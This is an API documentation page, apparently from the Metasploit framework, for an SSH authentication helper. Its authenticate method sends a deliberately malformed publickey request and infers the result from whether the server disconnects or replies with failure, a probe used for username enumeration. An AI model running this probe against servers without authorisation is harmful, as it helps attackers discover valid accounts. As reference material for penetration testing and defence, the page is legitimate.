Class: Net::SSH::Authentication::Methods::MalformedPacket

Inherits:
Abstract
  • Object
show all
Defined in:
lib/msf/core/exploit/remote/ssh/auth_methods/malformed_packet.rb

Overview

tools.ietf.org/rfc/rfc4252.txt tools.ietf.org/rfc/rfc4253.txt

Instance Method Summary collapse

Instance Method Details

#authenticate(service_name, username, password = nil) ⇒ Object 



12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
 
# File 'lib/msf/core/exploit/remote/ssh/auth_methods/malformed_packet.rb', line 12

def authenticate(service_name, username, password = nil)
  debug { 'Sending SSH_MSG_USERAUTH_REQUEST (publickey)' }

  # Corrupt everything after auth method
  send_message(userauth_request(
=begin
    string    user name in ISO-10646 UTF-8 encoding [RFC3629]
    string    service name in US-ASCII
    string    "publickey"
    boolean   FALSE
    string    public key algorithm name
    string    public key blob
=end
    username,
    service_name,
    'publickey',
    Rex::Text.rand_text_english(8..42)
  ))

  # SSH_MSG_DISCONNECT is queued
  begin
    message = session.next_message
  rescue Net::SSH::Disconnect
    debug { 'Received SSH_MSG_DISCONNECT' }
    return true
  end

  if message && message.type == USERAUTH_FAILURE
    debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
    return false
  end

  # We'll probably never hit this
  false
end